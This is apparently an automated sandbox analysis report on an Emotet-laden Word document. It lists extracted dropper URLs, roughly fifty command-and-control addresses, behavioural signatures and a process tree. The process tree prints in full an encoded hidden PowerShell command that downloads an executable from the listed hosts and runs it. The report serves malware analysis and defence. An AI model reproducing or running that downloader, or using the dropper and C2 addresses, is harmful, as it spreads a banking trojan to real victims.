1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

General
Target

1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

Filesize

N/A

Completed

25-12-2019 07:03

Score
10 /10
SHA256

1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

Malware Config

Extracted

Language ps1
Source
URLs
exe.dropper

http://joaoleobarbieri.adv.br/test/l4d6638v6l-fotnu5m-867027278/

exe.dropper

http://kaplanforklift.com/web_map/PmTuIEQ/

exe.dropper

http://londontravel.com.ar/brc/HsGpuPR/

exe.dropper

https://leavenworthrental.com/calendar/aoo-ue7-653740/

exe.dropper

http://lareserva.com.py/aloja/AOISroJmq/

Extracted

Family emotet
C2

85.100.122.211:80

78.189.165.52:8080

88.248.140.80:80

45.79.75.232:8080

124.150.175.133:80

164.68.115.146:8080

5.189.148.98:8080

96.234.38.186:8080

178.134.1.238:80

212.129.14.27:8080

78.186.102.195:80

66.229.161.86:443

190.17.94.108:443

91.117.31.181:80

119.57.36.54:8080

37.59.24.25:8080

200.41.121.69:443

217.181.139.237:443

86.70.224.211:80

216.75.37.196:8080

182.176.116.139:995

138.197.140.163:8080

187.250.92.82:80

82.146.55.23:7080

92.16.222.156:80

91.117.131.122:80

58.185.224.18:80

189.225.211.171:443

201.196.15.79:990

72.27.212.209:8080

100.38.11.243:80

190.161.67.63:80

128.92.54.20:80

158.69.167.246:8080

181.46.176.38:80

176.58.93.123:80

105.209.235.113:8080

67.254.196.78:443

190.47.236.83:80

192.210.217.94:8080

192.241.220.183:8080

191.100.24.201:50000

41.190.148.90:80

46.105.128.215:8080

185.192.75.240:443

172.104.70.207:8080

190.171.135.235:80

46.105.131.68:8080

72.51.153.27:80

221.154.59.110:80

rsa_pubkey.plain
Signatures 12

Filter: none

Discovery
  • Checks processor information in registry

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptionioc
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE973.exe973.exe

    Reported IOCs

    pidprocess
    4924WINWORD.EXE
    4672973.exe
    4740973.exe
  • Suspicious use of FindShellTrayWindow
    WINWORD.EXE

    Reported IOCs

    pidprocess
    4924WINWORD.EXE
  • Process spawned unexpected child process
    Powershell.exe

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process37485040Powershell.exe
  • Suspicious behavior: EnumeratesProcesses
    Powershell.exe

    Reported IOCs

    pidprocess
    3748Powershell.exe
  • Suspicious use of WriteProcessMemory
    Powershell.exe973.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3748 wrote to memory of 46723748Powershell.exe973.exe
    PID 4672 wrote to memory of 47404672973.exe973.exe
  • Emotet

    Description

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pidprocess
    4924WINWORD.EXE
  • Suspicious use of AdjustPrivilegeToken
    Powershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege3748Powershell.exe
  • Executes dropped EXE
    973.exe973.exe

    Reported IOCs

    pidprocess
    4672973.exe
    4740973.exe
  • Suspicious behavior: EmotetMutantsSpam
    973.exe

    Reported IOCs

    pidprocess
    4740973.exe
  • Enumerates system info in registry

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptionioc
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Processes 4
  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4.doc" /o ""
    Suspicious use of SetWindowsHookEx
    Suspicious use of FindShellTrayWindow
    Suspicious behavior: AddClipboardFormatListener
    PID:4924
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABPAGYAaAByAGYAYgBwAHgAcQA9ACcASABnAGEAZgBnAGoAagB6ACcAOwAkAE8AYQB4AGwAdQBsAHYAeABsAHcAZABsACAAPQAgACcAOQA3ADMAJwA7ACQARgBwAGkAbQByAHgAYQBxAGUAPQAnAFEAYwB2AHcAbgBnAGoAZAByAGsAdwBsACcAOwAkAE0AdQBtAG0AaQB3AGQAdwByAGIAZQBmAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE8AYQB4AGwAdQBsAHYAeABsAHcAZABsACsAJwAuAGUAeABlACcAOwAkAFUAcgBmAG0AdABtAGoAdgBqAD0AJwBKAHMAawBzAHcAegB3AHAAbQBxAHkAawAnADsAJABIAGUAbwBtAGUAdwBsAHoAdgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AVAA7ACQAVQBoAGkAdABkAG8AagBrAGMAPQAnAGgAdAB0AHAAOgAvAC8AagBvAGEAbwBsAGUAbwBiAGEAcgBiAGkAZQByAGkALgBhAGQAdgAuAGIAcgAvAHQAZQBzAHQALwBsADQAZAA2ADYAMwA4AHYANgBsAC0AZgBvAHQAbgB1ADUAbQAtADgANgA3ADAAMgA3ADIANwA4AC8AKgBoAHQAdABwADoALwAvAGsAYQBwAGwAYQBuAGYAbwByAGsAbABpAGYAdAAuAGMAbwBtAC8AdwBlAGIAXwBtAGEAcAAvAFAAbQBUAHUASQBFAFEALwAqAGgAdAB0AHAAOgAvAC8AbABvAG4AZABvAG4AdAByAGEAdgBlAGwALgBjAG8AbQAuAGEAcgAvAGIAcgBjAC8ASABzAEcAcAB1AFAAUgAvACoAaAB0AHQAcABzADoALwAvAGwAZQBhAHYAZQBuAHcAbwByAHQAaAByAGUAbgB0AGEAbAAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8AYQBvAG8ALQB1AGUANwAtADYANQAzADcANAAwAC8AKgBoAHQAdABwADoALwAvAGwAYQByAGUAcwBlAHIAdgBhAC4AYwBvAG0ALgBwAHkALwBhAGwAbwBqAGEALwBBAE8ASQBTAHIAbwBKAG0AcQAvACcALgAiAFMAcABsAGAAaQB0ACIAKAAnACoAJwApADsAJABEAHEAdwB0AHUAaQBlAHYAaAB4AGYAdgBkAD0AJwBMAHUAcwB1AGUAZQBuAHkAawB1AGsAYQB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABLAGMAcgBoAGsAcAB2AGsAcgB5AGYAYwBhACAAaQBuACAAJABVAGgAaQB0AGQAbwBqAGsAYwApAHsAdAByAHkAewAkAEgAZQBvAG0AZQB3AGwAegB2AC4AIgBkAGAAbwBXAG4AbABvAGAAQQBgAEQARgBpAGwAZQAiACgAJABLAGMAcgBoAGsAcAB2AGsAcgB5AGYAYwBhACwAIAAkAE0AdQBtAG0AaQB3AGQAdwByAGIAZQBmAGwAKQA7ACQAVwBoAHcAcQBxAHYAbgBjAG8AcwBvAD0AJwBOAG0AYgB3AGwAcQBiAHYAZgBwACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQATQB1AG0AbQBpAHcAZAB3AHIAYgBlAGYAbAApAC4AIgBMAGAARQBuAEcAVABIACIAIAAtAGcAZQAgADIANAAyADUAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAQQBgAFIAVAAiACgAJABNAHUAbQBtAGkAdwBkAHcAcgBiAGUAZgBsACkAOwAkAFIAbAB5AGoAaQBpAHYAcgBhAHgAegA9ACcAQwB5AHIAZABjAHEAcgBjAGwAeAB0AG8AJwA7AGIAcgBlAGEAawA7ACQAWQB0AHEAcwBxAHoAYQBlAGIAPQAnAEoAZgBzAHQAbQBvAGMAaQByACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAYgBtAHAAYQBuAGYAbgA9ACcAVABkAHcAeQBrAGYAaQBvAHQAeAB3AG4AJwA=
    Process spawned unexpected child process
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of WriteProcessMemory
    Suspicious use of AdjustPrivilegeToken
    PID:3748
    • C:\Users\Admin\973.exe
      "C:\Users\Admin\973.exe"
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      Executes dropped EXE
      PID:4672
      • C:\Users\Admin\973.exe
        --6e477d3
        Suspicious use of SetWindowsHookEx
        Executes dropped EXE
        Suspicious behavior: EmotetMutantsSpam
        PID:4740
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads
                        • C:\Users\Admin\973.exe

                        • C:\Users\Admin\973.exe

                        • C:\Users\Admin\973.exe

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

                        • memory/4672-10-0x00000000006D0000-0x00000000006E7000-memory.dmp

                        • memory/4740-13-0x00000000007E0000-0x00000000007F7000-memory.dmp

                        • memory/4740-14-0x0000000000400000-0x00000000004AA000-memory.dmp